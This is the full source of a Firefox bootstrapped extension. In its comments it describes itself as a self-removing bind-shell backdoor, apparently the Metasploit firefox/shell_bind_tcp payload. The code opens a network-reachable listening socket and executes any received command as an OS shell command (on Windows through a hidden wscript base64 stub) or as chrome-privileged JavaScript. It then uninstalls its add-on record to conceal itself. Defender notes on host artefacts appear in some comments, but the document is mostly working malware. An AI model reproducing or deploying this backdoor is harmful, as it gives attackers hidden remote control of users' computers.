// Bootstrapped-extension entry point (Firefox calls startup(data, reason) when
// the add-on is enabled).  This file is a self-removing bind-shell backdoor:
// it opens a listening TCP socket, executes whatever a client sends as an OS
// command or as privileged JavaScript, then uninstalls its own add-on record.
// Defender notes - the host-observable artefacts are: Firefox listening on the
// configured port; Firefox spawning /bin/sh (POSIX) or
// C:\Windows\System32\wscript.exe (Windows); and two fixed-name files in the
// temp directory, "I5yOzt1neFMfjSYjyY.js" and "JKsYPvN0AOYtet5mnB".
// `data` and `reason` are the standard bootstrap.js arguments; neither is used.
function startup(data, reason) {
  // Path of this extension inside the profile's "extensions" directory.
  // `file` is built but never referenced again in this file.
  var file = Components.classes["@mozilla.org/file/directory_service;1"].
    getService(Components.interfaces.nsIProperties).
    get("ProfD", Components.interfaces.nsIFile);
  file.append("extensions");
  // Add-on id used for the self-uninstall at the bottom.  Assigned without
  // `var`, so this becomes an implicit global in the bootstrap scope.
  xpi_guid="{861fb387-92ce-bb0a-cb48-4b923dbc292b}";
  file.append(xpi_guid);

  // # ./msfpayload firefox/shell_bind_tcp LPORT=1337 R
  // The IIFE below is the Metasploit firefox/shell_bind_tcp payload (per the
  // comment above); the port has been replaced by a template token that the
  // generating tool presumably substitutes before the XPI is built.
  (function(){
    Components.utils.import("resource://gre/modules/NetUtil.jsm");
    var lport = __bindshell_port_placeholder__;
    var rhost = ""; // unused in this payload
    var serverSocket = Components.classes["@mozilla.org/network/server-socket;1"]
      .createInstance(Components.interfaces.nsIServerSocket);
    // init(port, loopbackOnly, backlog): loopbackOnly is false, so the socket
    // is reachable from the network, not just from localhost.
    serverSocket.init(lport, false, -1);

    // Per accepted connection: open both stream halves and pump the input
    // stream asynchronously into clientListener, which executes what arrives.
    var listener = {
      onSocketAccepted: function(serverSocket, clientSocket) {
        var outStream = clientSocket.openOutputStream(0, 0, 0);
        var inStream = clientSocket.openInputStream(0, 0, 0);
        var pump = Components.classes["@mozilla.org/network/input-stream-pump;1"]
          .createInstance(Components.interfaces.nsIInputStreamPump);
        pump.init(inStream, -1, -1, 0, 0, true);
        pump.asyncRead(clientListener(outStream), null);
      }
    };

    // Stream listener bound to one client's output stream.  Every chunk of
    // data received is treated as a command; only successful results are
    // written back (an `err` from runCmd is silently dropped, so the client
    // sees nothing for e.g. an empty command).
    var clientListener = function(outStream) {
      return {
        onStartRequest: function(request, context) {},
        onStopRequest: function(request, context) {},
        onDataAvailable: function(request, context, stream, offset, count) {
          var data = NetUtil.readInputStreamToString(stream, count).trim();
          runCmd(data, function(err, output) {
            if(!err) outStream.write(output, output.length);
          });
        }
      };
    };



    // Reads `path` fully as raw bytes, deletes the file, and returns the bytes
    // as a string via String.fromCharCode (one char per byte - no UTF-8
    // decoding).  Any failure (missing file, permission error, ...) is
    // swallowed and an empty string is returned.  Used to collect the
    // command output that was redirected into the temp file.
    var readFile = function(path) {
      try {
        var file = Components.classes["@mozilla.org/file/local;1"]
          .createInstance(Components.interfaces.nsILocalFile);
        file.initWithPath(path);

        var fileStream = Components.classes["@mozilla.org/network/file-input-stream;1"]
          .createInstance(Components.interfaces.nsIFileInputStream);
        fileStream.init(file, 1, 0, false); // 1 = read-only open flag

        var binaryStream = Components.classes["@mozilla.org/binaryinputstream;1"]
          .createInstance(Components.interfaces.nsIBinaryInputStream);
        binaryStream.setInputStream(fileStream);
        var array = binaryStream.readByteArray(fileStream.available());

        binaryStream.close();
        fileStream.close();
        file.remove(true); // output file is removed after each read

        return array.map(function(aItem) { return String.fromCharCode(aItem); }).join("");
      } catch (e) { return ""; }
    };


    // Chrome-scope replacement for window.setTimeout built on nsITimer
    // (one-shot).  Every caller in this file passes only `cb`, so `delay` is
    // undefined here; how nsITimer treats that is not shown in this file.
    var setTimeout = function(cb, delay) {
      var timer = Components.classes["@mozilla.org/timer;1"].createInstance(Components.interfaces.nsITimer);
      timer.initWithCallback({notify:cb}, delay, Components.interfaces.nsITimer.TYPE_ONE_SHOT);
      return timer;
    };


    // OS detection via the HTTP user-agent string.
    var ua = Components.classes["@mozilla.org/network/protocol;1?name=http"]
      .getService(Components.interfaces.nsIHttpProtocolHandler).userAgent;
    var windows = (ua.indexOf("Windows")>-1);
    // Module scope of Services.jsm; only its `btoa` is used below.
    var svcs = Components.utils.import("resource://gre/modules/Services.jsm");
    // JScript stub written to disk on Windows.  It takes a base64 string as
    // its first argument, decodes it through an MSXML "bin.base64" node and an
    // ADODB.Stream, and runs the decoded text with WScript.Shell.Run using
    // window style 0 (hidden) and wait=true.  Detection: wscript.exe launched
    // by firefox.exe with a .js in the temp directory plus a base64 argument.
    var jscript = ({"src":"\n var b64 = WScript.arguments(0);\n var dom = new ActiveXObject(\"MSXML2.DOMDocument.3.0\");\n var el = dom.createElement(\"root\");\n el.dataType = \"bin.base64\"; el.text = b64; dom.appendChild(el);\n var stream = new ActiveXObject(\"ADODB.Stream\");\n stream.Type=1; stream.Open(); stream.Write(el.nodeTypedValue);\n stream.Position=0; stream.type=2; stream.CharSet = \"us-ascii\"; stream.Position=0;\n var cmd = stream.ReadText();\n (new ActiveXObject(\"WScript.Shell\")).Run(cmd, 0, true);\n "}).src;
    // Executes one command received from the socket.
    //   cmd - raw text from the client.  Two forms are handled:
    //         "[JAVASCRIPT]...[/JAVASCRIPT]" runs the inner text as JavaScript
    //         in this (chrome-privileged) scope; anything else is run as an OS
    //         shell command.
    //   cb  - cb(err, output); `err` is a string only for an empty command,
    //         otherwise false.  Callbacks are always invoked asynchronously.
    var runCmd = function(cmd, cb) {
      cb = cb || (function(){});

      if (cmd.trim().length == 0) {
        setTimeout(function(){ cb("Command is empty string ('')."); });
        return;
      }

      var js = (/^\s*\[JAVASCRIPT\]([\s\S]*)\[\/JAVASCRIPT\]/g).exec(cmd.trim());
      if (js) {
        var tag = "[!JAVASCRIPT]";
        var sync = true; // avoid zalgo's reach
        var sent = false;
        var retVal = null;

        try {
          // Function(...) on network input: the text between the tags runs with
          // the extension's full privileges.  It may reply either by returning
          // a value or by calling the `send` argument; `sync` is true while the
          // code is still executing so that a synchronous send() is deferred via
          // setTimeout and the callback never fires before runCmd returns.
          retVal = Function('send', js[1])(function(r){
            if (sent) return;
            sent = true
            if (r) {
              if (sync) setTimeout(function(){ cb(false, r+tag+"\n"); });
              else cb(false, r+tag+"\n");
            }
          });
        } catch (e) { retVal = e.message; }

        sync = false;

        // Return value (or the exception message) is sent only if send() was
        // not already used.
        if (retVal && !sent) {
          sent = true;
          setTimeout(function(){ cb(false, retVal+tag+"\n"); });
        }

        return;
      }

      // Shell form.  shEsc is the replacement applied to every non-word
      // character of the command ("\\$&" = backslash-escape on POSIX,
      // "\^$&" = caret-escape on Windows).
      var shEsc = "\\$&";
      var shPath = "/bin/sh -c"

      if (windows) {
        shPath = "cmd /c";
        shEsc = "\^$&";
        // Drop the JScript stub into the temp directory under a fixed name.
        // 0x04 | 0x08 | 0x20 are NSPR open flags (read-write, create, truncate).
        var jscriptFile = Components.classes["@mozilla.org/file/directory_service;1"]
          .getService(Components.interfaces.nsIProperties)
          .get("TmpD", Components.interfaces.nsIFile);
        jscriptFile.append('I5yOzt1neFMfjSYjyY.js');
        var stream = Components.classes["@mozilla.org/network/safe-file-output-stream;1"]
          .createInstance(Components.interfaces.nsIFileOutputStream);
        stream.init(jscriptFile, 0x04 | 0x08 | 0x20, 0666, 0);
        stream.write(jscript, jscript.length);
        if (stream instanceof Components.interfaces.nsISafeOutputStream) {
          stream.finish();
        } else {
          stream.close();
        }
      }

      // Fixed-name temp file that receives the command's stdout and stderr
      // (" >path 2>&1" below); readFile() deletes it after collecting it.
      var stdoutFile = "JKsYPvN0AOYtet5mnB";

      var stdout = Components.classes["@mozilla.org/file/directory_service;1"]
        .getService(Components.interfaces.nsIProperties)
        .get("TmpD", Components.interfaces.nsIFile);
      stdout.append(stdoutFile);

      // In both branches the shPath prefix is applied twice: the inner
      // "shPath cmd" string is escaped and wrapped in a second "shPath ...",
      // so the command runs as a shell nested inside another shell, with the
      // redirection attached to the outer one.  The Windows variant is then
      // base64-encoded for the JScript stub's argument.
      if (windows) {
        var shell = shPath+" "+cmd;
        shell = shPath+" "+shell.replace(/\W/g, shEsc)+" >"+stdout.path+" 2>&1";
        var b64 = svcs.btoa(shell);
      } else {
        var shell = shPath+" "+cmd.replace(/\W/g, shEsc);
        shell = shPath+" "+shell.replace(/\W/g, shEsc) + " >"+stdout.path+" 2>&1";
      }
      var process = Components.classes["@mozilla.org/process/util;1"]
        .createInstance(Components.interfaces.nsIProcess);
      var sh = Components.classes["@mozilla.org/file/local;1"]
        .createInstance(Components.interfaces.nsILocalFile);

      // process.run(true, ...) blocks until the child exits; the output is then
      // collected on the next timer tick.  On Windows the stub file is removed
      // right after the run and the reply is prefixed with the command text;
      // on POSIX only the captured output is returned.
      if (windows) {
        sh.initWithPath("C:\\Windows\\System32\\wscript.exe");
        process.init(sh);
        var args = [jscriptFile.path, b64];
        process.run(true, args, args.length);
        jscriptFile.remove(true);
        setTimeout(function(){cb(false, cmd+"\n"+readFile(stdout.path));});
      } else {
        sh.initWithPath("/bin/sh");
        process.init(sh);
        var args = ["-c", shell];
        process.run(true, args, args.length);
        setTimeout(function(){cb(false, readFile(stdout.path));});
      }
    };


    serverSocket.asyncListen(listener);
  })();


  // Self-removal: uninstall this add-on's record through whichever API the
  // running Firefox provides; both attempts swallow errors.  The listening
  // socket set up above has already been created at this point, so the
  // uninstall presumably only removes the add-on entry rather than the
  // running listener - confirm against the add-on manager's shutdown handling.
  try { // Fx < 4.0
    Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).uninstallItem(xpi_guid);
  } catch (e) {}
  try { // Fx 4.0 and later
    Components.utils.import("resource://gre/modules/AddonManager.jsm");
    AddonManager.getAddonByID(xpi_guid, function(addon) {
      addon.uninstall();
    });
  } catch (e) {}
}